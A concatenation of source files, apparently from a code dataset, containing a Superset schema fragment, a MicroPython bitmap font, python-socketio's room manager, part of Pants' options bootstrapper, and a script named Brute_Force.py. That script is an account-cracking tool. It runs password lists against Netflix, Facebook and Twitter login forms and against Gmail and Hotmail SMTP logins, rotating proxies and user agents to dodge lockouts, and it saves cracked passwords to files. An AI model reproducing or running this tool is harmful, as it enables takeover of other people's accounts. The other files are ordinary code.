ChartDataQueryContextSchema,
ChartDataResponseSchema,
ChartDataAsyncResponseSchema,
# TODO: These should optimally be included in the QueryContext schema as an `anyOf`
# in ChartDataPostPricessingOperation.options, but since `anyOf` is not
# by Marshmallow<3, this is not currently possible.
ChartDataAdhocMetricSchema,
ChartDataAggregateOptionsSchema,
ChartDataContributionOptionsSchema,
ChartDataProphetOptionsSchema,
ChartDataBoxplotOptionsSchema,
ChartDataPivotOptionsSchema,
ChartDataRollingOptionsSchema,
ChartDataSelectOptionsSchema,
ChartDataSortOptionsSchema,
ChartDataGeohashDecodeOptionsSchema,
ChartDataGeohashEncodeOptionsSchema,
ChartDataGeodeticParseOptionsSchema,
ChartEntityResponseSchema,
ChartGetDatasourceResponseSchema,
ChartCacheScreenshotResponseSchema,
GetFavStarIdsSchema,
)
| 35.042776 | 88 | 0.633977 |
795bb78867340afa17dd66d6c6e39d13a275458e | 5,987 | py | Python | fonts/svga141_8x14.py | ccccmagicboy/st7735_mpy | b15f1bde69fbe6e0eb4931c57e71c136d8e7f024 | [
"MIT"
] | 6 | 2020-07-11T16:59:19.000Z | 2021-07-16T19:32:49.000Z | ports/esp32/user_modules/st7735_mpy/fonts/svga141_8x14.py | d4niele/micropython | a1f7b37d392bf46b28045ce215ae899fda8d8c38 | [
"MIT"
] | 1 | 2020-04-14T03:14:45.000Z | 2020-04-14T03:14:45.000Z | fonts/svga141_8x14.py | ccccmagicboy/st7735_mpy | b15f1bde69fbe6e0eb4931c57e71c136d8e7f024 | [
"MIT"
] | null | null | null | """converted from ..\fonts\SVGA141__8x14.bin """
WIDTH = 8
HEIGHT = 14
FIRST = 0x20
LAST = 0x7f
_FONT =\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x18\x3c\x3c\x3c\x18\x18\x00\x18\x18\x00\x00\x00'\
b'\x00\x66\x66\x66\x24\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x6c\x6c\xfe\x6c\x6c\x6c\xfe\x6c\x6c\x00\x00\x00'\
b'\x18\x18\x7c\xc6\xc2\xc0\x7c\x06\x86\xc6\x7c\x18\x18\x00'\
b'\x00\x00\x00\x00\xc2\xc6\x0c\x18\x30\x66\xc6\x00\x00\x00'\
b'\x00\x00\x38\x6c\x6c\x38\x76\xdc\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x30\x30\x30\x60\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x0c\x18\x30\x30\x30\x30\x30\x18\x0c\x00\x00\x00'\
b'\x00\x00\x30\x18\x0c\x0c\x0c\x0c\x0c\x18\x30\x00\x00\x00'\
b'\x00\x00\x00\x00\x66\x3c\xff\x3c\x66\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x18\x18\x7e\x18\x18\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x18\x18\x18\x30\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\xfe\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x18\x00\x00\x00'\
b'\x00\x00\x02\x06\x0c\x18\x30\x60\xc0\x80\x00\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xce\xde\xf6\xe6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x18\x38\x78\x18\x18\x18\x18\x18\x7e\x00\x00\x00'\
b'\x00\x00\x7c\xc6\x06\x0c\x18\x30\x60\xc6\xfe\x00\x00\x00'\
b'\x00\x00\x7c\xc6\x06\x06\x3c\x06\x06\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x0c\x1c\x3c\x6c\xcc\xfe\x0c\x0c\x1e\x00\x00\x00'\
b'\x00\x00\xfe\xc0\xc0\xc0\xfc\x06\x06\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x38\x60\xc0\xc0\xfc\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xfe\xc6\x06\x0c\x18\x30\x30\x30\x30\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\x7c\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\x7e\x06\x06\x0c\x78\x00\x00\x00'\
b'\x00\x00\x00\x18\x18\x00\x00\x00\x18\x18\x00\x00\x00\x00'\
b'\x00\x00\x00\x18\x18\x00\x00\x00\x18\x18\x30\x00\x00\x00'\
b'\x00\x00\x06\x0c\x18\x30\x60\x30\x18\x0c\x06\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7e\x00\x00\x7e\x00\x00\x00\x00\x00'\
b'\x00\x00\x60\x30\x18\x0c\x06\x0c\x18\x30\x60\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\x0c\x18\x18\x00\x18\x18\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xde\xde\xde\xdc\xc0\x7c\x00\x00\x00'\
b'\x00\x00\x10\x38\x6c\xc6\xc6\xfe\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x66\x66\x66\xfc\x00\x00\x00'\
b'\x00\x00\x3c\x66\xc2\xc0\xc0\xc0\xc2\x66\x3c\x00\x00\x00'\
b'\x00\x00\xf8\x6c\x66\x66\x66\x66\x66\x6c\xf8\x00\x00\x00'\
b'\x00\x00\xfe\x66\x62\x68\x78\x68\x62\x66\xfe\x00\x00\x00'\
b'\x00\x00\xfe\x66\x62\x68\x78\x68\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x3c\x66\xc2\xc0\xc0\xde\xc6\x66\x3a\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xfe\xc6\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x3c\x18\x18\x18\x18\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\x1e\x0c\x0c\x0c\x0c\x0c\xcc\xcc\x78\x00\x00\x00'\
b'\x00\x00\xe6\x66\x6c\x6c\x78\x6c\x6c\x66\xe6\x00\x00\x00'\
b'\x00\x00\xf0\x60\x60\x60\x60\x60\x62\x66\xfe\x00\x00\x00'\
b'\x00\x00\xc6\xee\xfe\xfe\xd6\xc6\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\xc6\xe6\xf6\xfe\xde\xce\xc6\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x38\x6c\xc6\xc6\xc6\xc6\xc6\x6c\x38\x00\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x60\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\xc6\xc6\xd6\xde\x7c\x0c\x0e\x00\x00'\
b'\x00\x00\xfc\x66\x66\x66\x7c\x6c\x66\x66\xe6\x00\x00\x00'\
b'\x00\x00\x7c\xc6\xc6\x60\x38\x0c\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x7e\x7e\x5a\x18\x18\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xc6\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xc6\xc6\x6c\x38\x10\x00\x00\x00'\
b'\x00\x00\xc6\xc6\xc6\xc6\xd6\xd6\xfe\x7c\x6c\x00\x00\x00'\
b'\x00\x00\xc6\xc6\x6c\x38\x38\x38\x6c\xc6\xc6\x00\x00\x00'\
b'\x00\x00\x66\x66\x66\x66\x3c\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\xfe\xc6\x8c\x18\x30\x60\xc2\xc6\xfe\x00\x00\x00'\
b'\x00\x00\x3c\x30\x30\x30\x30\x30\x30\x30\x3c\x00\x00\x00'\
b'\x00\x00\x80\xc0\xe0\x70\x38\x1c\x0e\x06\x02\x00\x00\x00'\
b'\x00\x00\x3c\x0c\x0c\x0c\x0c\x0c\x0c\x0c\x3c\x00\x00\x00'\
b'\x10\x38\x6c\xc6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\x00'\
b'\x30\x30\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x78\x0c\x7c\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x00\xe0\x60\x60\x78\x6c\x66\x66\x66\x7c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xc0\xc0\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x1c\x0c\x0c\x3c\x6c\xcc\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xfe\xc0\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x38\x6c\x64\x60\xf0\x60\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x76\xcc\xcc\xcc\x7c\x0c\xcc\x78\x00'\
b'\x00\x00\xe0\x60\x60\x6c\x76\x66\x66\x66\xe6\x00\x00\x00'\
b'\x00\x00\x18\x18\x00\x38\x18\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\x06\x06\x00\x0e\x06\x06\x06\x06\x66\x66\x3c\x00'\
b'\x00\x00\xe0\x60\x60\x66\x6c\x78\x6c\x66\xe6\x00\x00\x00'\
b'\x00\x00\x38\x18\x18\x18\x18\x18\x18\x18\x3c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xec\xfe\xd6\xd6\xd6\xc6\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xdc\x66\x66\x66\x66\x66\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\xc6\xc6\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xdc\x66\x66\x66\x7c\x60\x60\xf0\x00'\
b'\x00\x00\x00\x00\x00\x76\xcc\xcc\xcc\x7c\x0c\x0c\x1e\x00'\
b'\x00\x00\x00\x00\x00\xdc\x76\x66\x60\x60\xf0\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x7c\xc6\x70\x1c\xc6\x7c\x00\x00\x00'\
b'\x00\x00\x10\x30\x30\xfc\x30\x30\x30\x36\x1c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xcc\xcc\xcc\xcc\xcc\x76\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\x66\x66\x66\x66\x3c\x18\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\xc6\xd6\xd6\xfe\x6c\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\x6c\x38\x38\x6c\xc6\x00\x00\x00'\
b'\x00\x00\x00\x00\x00\xc6\xc6\xc6\xc6\x7e\x06\x0c\xf8\x00'\
b'\x00\x00\x00\x00\x00\xfe\xcc\x18\x30\x66\xfe\x00\x00\x00'\
b'\x00\x00\x0e\x18\x18\x18\x70\x18\x18\x18\x0e\x00\x00\x00'\
b'\x00\x00\x18\x18\x18\x18\x00\x18\x18\x18\x18\x00\x00\x00'\
b'\x00\x00\x70\x18\x18\x18\x0e\x18\x18\x18\x70\x00\x00\x00'\
b'\x00\x00\x76\xdc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'\
b'\x00\x00\x00\x00\x10\x38\x6c\xc6\xc6\xfe\x00\x00\x00\x00'\
FONT = memoryview(_FONT)
| 57.019048 | 60 | 0.704359 |
795bb886c8972d63b1627377334b014c09f72c8c | 11,426 | py | Python | core/Brute_Force.py | Ankesh054-official/LittleBrother-GUI- | db1f338109b756a78c2fb142a9f7a5263aef3c12 | [
"MIT"
] | 16 | 2020-09-16T09:10:43.000Z | 2022-02-17T02:19:54.000Z | core/Brute_Force.py | swagkarna/LittleBrother-GUI- | 73bfca36c3c0640b9c59c135ca1877e84449bf77 | [
"MIT"
] | 1 | 2020-12-24T02:06:26.000Z | 2021-01-14T05:50:08.000Z | core/Brute_Force.py | Ankesh054-official/LittleBrother-GUI- | db1f338109b756a78c2fb142a9f7a5263aef3c12 | [
"MIT"
] | 4 | 2020-09-16T14:00:47.000Z | 2021-01-04T04:16:23.000Z | #!/usr/bin/python
# -*- coding: utf-8 -*-
import smtplib
import threading
from optparse import *
import time
try :
from proxylist import ProxyList
except:
print("pip3 install proxylist ")
try :
from mechanize import Browser
except:
print("pip3 install mechanize")
from os import *
from tkinter import *
from tkinter.ttk import Progressbar
from tkinter import filedialog
import sys
import logging
import io
import random
try:
import cookielib
except:
import http.cookiejar as cookielib
try:
import mechanize
except:
print("pip3 install mechanize ")
#Coding Function Proxy 0xAbdullah
def proxy():
logging.basicConfig()
pl = ProxyList()
try:
pl.load_file(proxyList)
except:
sys.exit('[!] Proxy File format has incorrect | EXIT...')
pl.random()
getProxy = pl.random().address()
brows.set_proxies(proxies={"https": getProxy})
try:
checkProxyIP = brows.open("https://api.ipify.org/?format=raw", timeout=10)
except:
return proxy()
def Netflix():
password_list = io.open(options.filedialog.askdirectory(),"r").readlines()
try_login = 0
print("\r Netflix Account: {}".format(options.netflix))
print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s"%(R,W))
for password in password_list:
password = password.rstrip('\n')
try_login += 1
if try_login == 10:
try_login = 0
proxy()
print('\rPassword [==] {} '.format(password).rstrip("\n"))
sys.stdout.flush
url = "https://www.netflix.com/sa/login"
try:
brows.open(url, timeout=10)
brows.select_form(nr=0)
brows.form['userLoginId'] = options.netflix
brows.form['password'] = password
brows.method = "POST"
submit = brows.submit()
if 'https://www.netflix.com/browse' in submit.geturl():
print("{}[True][+] Password Found [{}][+]".format(G,password))
Save = io.open("Netflix.txt","a").write("Account Netflix:"+options.netflix+"\t\tPassword:"+password+"\n")
break
else :
print("%s[!] False Login Password%s\n"%(R,W))
except:
print('[!] <<<There are speeches in Communication>>> \n')
proxy()
def facebook(brows):
password_list = io.open(filedialog.askdirectory(),"r").readlines()
try_login = 0
print("\rFacebook Account: {}".format(facebook))
print("<<<<<<+++++Start Attacking Email+++++>>>>>")
for password in password_list:
password = password.rstrip('\n')
try_login += 1
if try_login == 10:
try_login = 0
proxy()
print('\rPassword [==] {} '.format(password).rstrip("\n"))
sys.stdout.flush
url = "https://ar-ar.facebook.com/login"
try:
brows.open(url, timeout=5)
brows.select_form(nr=0)
brows.form['email'] = facebook
brows.form['pass'] = password
brows.method = "POST"
submit = brows.submit()
if 'https://www.facebook.com/?sk=welcome' in submit.geturl():
print("[True][+] Password Found [{}]".format(password))
Save = io.open("Facebook.txt","a").write("Account Facebook:"+facebook+"\t\tPassword:"+password+"\n")
break
else :
print("False Login Password%s\n")
except:
print('[!] <<<There are speeches in Communication>>> \n')
proxy()
def twitter():
password_list = io.open(list_password,"r").readlines()
try_login = 0
print("\rTwitter Account: {}".format(twitter))
print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s"%(R,W))
for password in password_list:
password = password.rstrip('\n')
try_login += 1
if try_login == 10:
try_login = 0
proxy()
print('\rPassword [==] {} '.format(password).rstrip("\n"))
sys.stdout.flush
url = "https://mobile.twitter.com/login"
try:
brows.open(url, timeout=5)
brows.select_form(nr=0)
brows.form['session[username_or_email]'] = options.twitter.strip()
brows.form['session[password]'] = password
brows.method = "POST"
submit = brows.submit()
if submit.geturl() == "https://mobile.twitter.com/":
print("{}[True][+] Password Found [{}][+]".format(G,password))
Save = io.open("Twitter.txt","a").write("Account Twitter:"+options.twitter+"\t\tPassword:"+password+"\n")
break
elif submit.geturl() == "https://mobile.twitter.com/home":
print("{}[True][+] Password Found [{}][+]".format(G,password))
Save = io.open("Twitter.txt","a").write("Account Twitter:"+options.twitter+"\t\tPassword:"+password+"\n")
break
elif 'https://mobile.twitter.com/account/login_challenge' in submit.geturl():
print("{}[True][+] Password Found [{}][+]".format(G,password))
Save = io.open("Twitter.txt","a").write("Account Twitter:"+options.twitter+"\t\tPassword:"+password+"\n")
break
elif 'https://mobile.twitter.com/account/locked' in submit.geturl():
proxy()
else:
print("%s[!] False Login Password%s\n"%(R,W))
except:
print('[!] <<<There are speeches in Communication>>> \n')
proxy()
def bruteforce(self):
progress = Progressbar(self, orient=HORIZONTAL, length=200, mode='determinate')
progress.place(x=600, y=200)
use = OptionParser()
use.add_option("-g", "--gmail", dest="gmail", help="Write Your Account gmail")
use.add_option("-t", "--hotmail", dest="hotmail", help="Write Your Account hotmail")
use.add_option("-T", "--twitter", dest="twitter", help="Write Your Account twitter")
use.add_option("-f", "--facebook", dest="facebook", help="Write Your Account facebook")
use.add_option("-n", "--netflix", dest="netflix", help="Write Your Account Netflix")
use.add_option("-l", "--list", dest="list_password", help="Write Your list passowrd")
use.add_option("-p", "--password", dest="password", help="Write Your passowrd ")
use.add_option("-X", "--proxy", dest="proxy", help="Proxy list ")
(options, args) = use.parse_args()
brows = Browser()
brows.set_handle_robots(False)
brows._factory.is_html = True
brows.set_cookiejar(cookielib.LWPCookieJar())
useragents = [
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.19) Gecko/20081202 Firefox (Debian-2.0.0.19-0etch1)',
'Opera/9.80 (J2ME/MIDP; Opera Mini/9.80 (S60; SymbOS; Opera Mobi/23.348; U; en) Presto/2.5.25 Version/10.54',
'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.12 Safari/535.11',
'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.6 (KHTML, like Gecko) Chrome/16.0.897.0 Safari/535.6']
brows.addheaders = [('User-agent', random.choice(useragents))]
brows.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
proxyList = options.proxy
if options.gmail == None:
if options.hotmail == None:
if options.twitter == None:
if facebook == None:
if options.netflix == None:
print(use.usage)
exit()
elif options.hotmail != None or options.gmail == None:
smtp_srverH = smtplib.SMTP('smtp.live.com', 587)
smtp_srverH.ehlo()
smtp_srverH.starttls()
if options.password != None or options.list_password == None:
print("<<<<<<+++++Start Attacking Email+++++>>>>>")
try:
smtp_srverH.login(options.hotmail, options.password)
print("Found Password :{} \t Found Hotmail:{}".format(options.password, options.hotmail))
Save = io.open("Hotmail.txt", "a").write(
"Account Hotmail:" + options.hotmail + "\t\tPassword:" + options.password + "\n")
except:
print("Not Found Password : {} \t Email Hotmail:{}".format(options.password, options.hotmail))
elif options.list_password != None or options.password == None:
password_list = io.open(options.list_password, "r").readlines()
for password in password_list:
try:
print("<<<<<<+++++Start Attacking Email+++++>>>>>")
smtp_srverH.login(options.hotmail, password)
print("FOUND Password :{} \n Found Hotmail:{}".format(password, options.hotmail))
Save = io.open("Hotmail.txt", "a").write(
"Account Hotmail:" + options.hotmail + "\t\tPassword:" + password + "\n")
except smtplib.SMTPAuthenticationError:
print("Not Found Password : {} \t Email Hotmail:{}".format(password, options.hotmail))
if options.twitter != None:
hejab = threading.Thread(target=twitter, name="hejab")
hejab.start()
if options.facebook != None:
facebook(brows)
if options.netflix != None:
netflix = threading.Thread(target=Netflix, name="Netflix")
netflix.start()
elif options.gmail != None or options.hotmail == None or options.twitter == None:
smtp_srverG = smtplib.SMTP('smtp.gmail.com', 587)
smtp_srverG.ehlo()
smtp_srverG.starttls()
if options.password != None or options.list_password == None:
print("%s<<<<<<+++++Start Attacking Email+++++>>>>>%s" % (R, W))
try:
smtp_srverG.login(options.gmail, options.password)
print("Found Password :{} \t Found Gmail:{}".format(options.password, options.gmail))
Save = io.open("Gmail.txt", "a").write(
"Account Gmail:" + options.gmail + "\t\tPassword:" + options.password + "\n")
except:
print("Not Found Password : {} \t Email Gmail:{}".format(options.password, options.gmail))
elif options.list_password != None:
password_list = io.open(options.list_password, "r").readlines()
for password in password_list:
password = password.rstrip("\n")
print("<<<<<<+++++Start Attacking Email+++++>>>>>")
try:
smtp_srverG.login(options.gmail, password)
print("{}<<<+++Found Password :{} \t Found Gmail:{}+++>>>".format(G, password, options.gmail))
Save = io.open("Gmail.txt", "a").write(
"Account Gmail:" + options.gmail + "\t\tPassword:" + password + "\n")
break
except smtplib.SMTPAuthenticationError:
print("{}<<<---Not Found Password : {} \t Email Gmail:{}--->>>".format(R, password, options.gmail))
else:
print(use.usage)
exit()
############################################################THE END####################################################################
root = Tk()
bruteforce(root)
root.mainloop()
| 44.11583 | 143 | 0.553037 |
795bb93a9c95e13049eb5474019eb1afa55a06c9 | 6,905 | py | Python | env/Lib/site-packages/socketio/base_manager.py | NXPY123/gsoc-tagger | c85602ae9f5dbb9bec45cc5e9e50ec62177d46a5 | [
"MIT"
] | 9 | 2021-02-15T05:53:17.000Z | 2022-02-25T01:47:09.000Z | env/Lib/site-packages/socketio/base_manager.py | NXPY123/gsoc-tagger | c85602ae9f5dbb9bec45cc5e9e50ec62177d46a5 | [
"MIT"
] | 5 | 2022-02-04T13:00:12.000Z | 2022-02-24T18:13:24.000Z | env/Lib/site-packages/socketio/base_manager.py | NXPY123/gsoc-tagger | c85602ae9f5dbb9bec45cc5e9e50ec62177d46a5 | [
"MIT"
] | 7 | 2022-02-05T20:29:14.000Z | 2022-03-26T13:16:44.000Z | import itertools
import logging
from bidict import bidict
default_logger = logging.getLogger('socketio')
class BaseManager(object):
"""Manage client connections.
This class keeps track of all the clients and the rooms they are in, to
support the broadcasting of messages. The data used by this class is
stored in a memory structure, making it appropriate only for single process
services. More sophisticated storage backends can be implemented by
subclasses.
"""
def __init__(self):
self.logger = None
self.server = None
self.rooms = {} # self.rooms[namespace][room][sio_sid] = eio_sid
self.eio_to_sid = {}
self.callbacks = {}
self.pending_disconnect = {}
def set_server(self, server):
self.server = server
def initialize(self):
"""Invoked before the first request is received. Subclasses can add
their initialization code here.
"""
pass
def get_namespaces(self):
"""Return an iterable with the active namespace names."""
return self.rooms.keys()
def get_participants(self, namespace, room):
"""Return an iterable with the active participants in a room."""
for sid, eio_sid in self.rooms[namespace][room]._fwdm.copy().items():
yield sid, eio_sid
def connect(self, eio_sid, namespace):
"""Register a client connection to a namespace."""
sid = self.server.eio.generate_id()
self.enter_room(sid, namespace, None, eio_sid=eio_sid)
self.enter_room(sid, namespace, sid, eio_sid=eio_sid)
return sid
def is_connected(self, sid, namespace):
if namespace in self.pending_disconnect and \
sid in self.pending_disconnect[namespace]:
# the client is in the process of being disconnected
return False
try:
return self.rooms[namespace][None][sid] is not None
except KeyError:
pass
def sid_from_eio_sid(self, eio_sid, namespace):
try:
return self.rooms[namespace][None]._invm[eio_sid]
except KeyError:
pass
def eio_sid_from_sid(self, sid, namespace):
if namespace in self.rooms:
return self.rooms[namespace][None].get(sid)
def can_disconnect(self, sid, namespace):
return self.is_connected(sid, namespace)
def pre_disconnect(self, sid, namespace):
"""Put the client in the to-be-disconnected list.
This allows the client data structures to be present while the
disconnect handler is invoked, but still recognize the fact that the
client is soon going away.
"""
if namespace not in self.pending_disconnect:
self.pending_disconnect[namespace] = []
self.pending_disconnect[namespace].append(sid)
return self.rooms[namespace][None].get(sid)
def disconnect(self, sid, namespace):
"""Register a client disconnect from a namespace."""
if namespace not in self.rooms:
return
rooms = []
for room_name, room in self.rooms[namespace].copy().items():
if sid in room:
rooms.append(room_name)
for room in rooms:
self.leave_room(sid, namespace, room)
if sid in self.callbacks:
del self.callbacks[sid]
if namespace in self.pending_disconnect and \
sid in self.pending_disconnect[namespace]:
self.pending_disconnect[namespace].remove(sid)
if len(self.pending_disconnect[namespace]) == 0:
del self.pending_disconnect[namespace]
def enter_room(self, sid, namespace, room, eio_sid=None):
"""Add a client to a room."""
if namespace not in self.rooms:
self.rooms[namespace] = {}
if room not in self.rooms[namespace]:
self.rooms[namespace][room] = bidict()
if eio_sid is None:
eio_sid = self.rooms[namespace][None][sid]
self.rooms[namespace][room][sid] = eio_sid
def leave_room(self, sid, namespace, room):
"""Remove a client from a room."""
try:
del self.rooms[namespace][room][sid]
if len(self.rooms[namespace][room]) == 0:
del self.rooms[namespace][room]
if len(self.rooms[namespace]) == 0:
del self.rooms[namespace]
except KeyError:
pass
def close_room(self, room, namespace):
"""Remove all participants from a room."""
try:
for sid, _ in self.get_participants(namespace, room):
self.leave_room(sid, namespace, room)
except KeyError:
pass
def get_rooms(self, sid, namespace):
"""Return the rooms a client is in."""
r = []
try:
for room_name, room in self.rooms[namespace].items():
if room_name is not None and sid in room:
r.append(room_name)
except KeyError:
pass
return r
def emit(self, event, data, namespace, room=None, skip_sid=None,
callback=None, **kwargs):
"""Emit a message to a single client, a room, or all the clients
connected to the namespace."""
if namespace not in self.rooms or room not in self.rooms[namespace]:
return
if not isinstance(skip_sid, list):
skip_sid = [skip_sid]
for sid, eio_sid in self.get_participants(namespace, room):
if sid not in skip_sid:
if callback is not None:
id = self._generate_ack_id(sid, callback)
else:
id = None
self.server._emit_internal(eio_sid, event, data, namespace, id)
def trigger_callback(self, sid, id, data):
"""Invoke an application callback."""
callback = None
try:
callback = self.callbacks[sid][id]
except KeyError:
# if we get an unknown callback we just ignore it
self._get_logger().warning('Unknown callback received, ignoring.')
else:
del self.callbacks[sid][id]
if callback is not None:
callback(*data)
def _generate_ack_id(self, sid, callback):
"""Generate a unique identifier for an ACK packet."""
if sid not in self.callbacks:
self.callbacks[sid] = {0: itertools.count(1)}
id = next(self.callbacks[sid][0])
self.callbacks[sid][id] = callback
return id
def _get_logger(self):
"""Get the appropriate logger
Prevents uninitialized servers in write-only mode from failing.
"""
if self.logger:
return self.logger
elif self.server:
return self.server.logger
else:
return default_logger
| 35.777202 | 79 | 0.602317 |
795bb989eb24a6e6fa7d2592744c9fc6c0b58884 | 9,901 | py | Python | src/python/pants/option/options_bootstrapper.py | AHassanSOS/pants | fe3d9834c0e2d78bb252604d6572ffd3b7ac5226 | [
"Apache-2.0"
] | 1 | 2020-08-26T03:30:31.000Z | 2020-08-26T03:30:31.000Z | src/python/pants/option/options_bootstrapper.py | AHassanSOS/pants | fe3d9834c0e2d78bb252604d6572ffd3b7ac5226 | [
"Apache-2.0"
] | 1 | 2021-09-02T14:16:37.000Z | 2021-09-02T14:16:37.000Z | src/python/pants/option/options_bootstrapper.py | AHassanSOS/pants | fe3d9834c0e2d78bb252604d6572ffd3b7ac5226 | [
"Apache-2.0"
] | null | null | null | # Copyright 2014 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import itertools
import logging
import os
import stat
import sys
from pants.base.build_environment import get_default_pants_config_file
from pants.engine.fs import FileContent
from pants.option.arg_splitter import GLOBAL_SCOPE, GLOBAL_SCOPE_CONFIG_SECTION
from pants.option.config import Config
from pants.option.custom_types import ListValueComponent
from pants.option.global_options import GlobalOptionsRegistrar
from pants.option.options import Options
from pants.util.dirutil import read_file
from pants.util.memo import memoized_method, memoized_property
from pants.util.objects import SubclassesOf, datatype
from pants.util.strutil import ensure_text
logger = logging.getLogger(__name__)
class OptionsBootstrapper(datatype([
('env_tuples', tuple),
('bootstrap_args', tuple),
('args', tuple),
('config', SubclassesOf(Config)),
])):
"""Holds the result of the first stage of options parsing, and assists with parsing full options."""
@staticmethod
def get_config_file_paths(env, args):
"""Get the location of the config files.
The locations are specified by the --pants-config-files option. However we need to load the
config in order to process the options. This method special-cases --pants-config-files
in order to solve this chicken-and-egg problem.
Note that, obviously, it's not possible to set the location of config files in a config file.
Doing so will have no effect.
"""
# This exactly mirrors the logic applied in Option to all regular options. Note that we'll
# also parse --pants-config as a regular option later, but there's no harm in that. In fact,
# it's preferable, so that any code that happens to want to know where we read config from
# can inspect the option.
flag = '--pants-config-files='
evars = ['PANTS_GLOBAL_PANTS_CONFIG_FILES', 'PANTS_PANTS_CONFIG_FILES', 'PANTS_CONFIG_FILES']
path_list_values = []
if os.path.isfile(get_default_pants_config_file()):
path_list_values.append(ListValueComponent.create(get_default_pants_config_file()))
for var in evars:
if var in env:
path_list_values.append(ListValueComponent.create(env[var]))
break
for arg in args:
# Technically this is very slightly incorrect, as we don't check scope. But it's
# very unlikely that any task or subsystem will have an option named --pants-config-files.
# TODO: Enforce a ban on options with a --pants- prefix outside our global options?
if arg.startswith(flag):
path_list_values.append(ListValueComponent.create(arg[len(flag):]))
return ListValueComponent.merge(path_list_values).val
@staticmethod
def parse_bootstrap_options(env, args, config):
bootstrap_options = Options.create(
env=env,
config=config,
known_scope_infos=[GlobalOptionsRegistrar.get_scope_info()],
args=args,
)
def register_global(*args, **kwargs):
## Only use of Options.register?
bootstrap_options.register(GLOBAL_SCOPE, *args, **kwargs)
GlobalOptionsRegistrar.register_bootstrap_options(register_global)
return bootstrap_options
@classmethod
def from_options_parse_request(cls, parse_request):
return cls.create(env=dict(parse_request.env), args=parse_request.args)
@classmethod
def create(cls, env=None, args=None):
"""Parses the minimum amount of configuration necessary to create an OptionsBootstrapper.
:param env: An environment dictionary, or None to use `os.environ`.
:param args: An args array, or None to use `sys.argv`.
"""
env = {k: v for k, v in (os.environ if env is None else env).items()
if k.startswith('PANTS_')}
args = tuple(sys.argv if args is None else args)
flags = set()
short_flags = set()
# TODO: This codepath probably shouldn't be using FileContent, which is a very v2 engine thing.
def filecontent_for(path):
is_executable = os.stat(path).st_mode & stat.S_IXUSR == stat.S_IXUSR
return FileContent(
ensure_text(path),
read_file(path, binary_mode=True),
is_executable=is_executable,
)
def capture_the_flags(*args, **kwargs):
for arg in args:
flags.add(arg)
if len(arg) == 2:
short_flags.add(arg)
elif kwargs.get('type') == bool:
flags.add('--no-{}'.format(arg[2:]))
GlobalOptionsRegistrar.register_bootstrap_options(capture_the_flags)
def is_bootstrap_option(arg):
components = arg.split('=', 1)
if components[0] in flags:
return True
for flag in short_flags:
if arg.startswith(flag):
return True
return False
# Take just the bootstrap args, so we don't choke on other global-scope args on the cmd line.
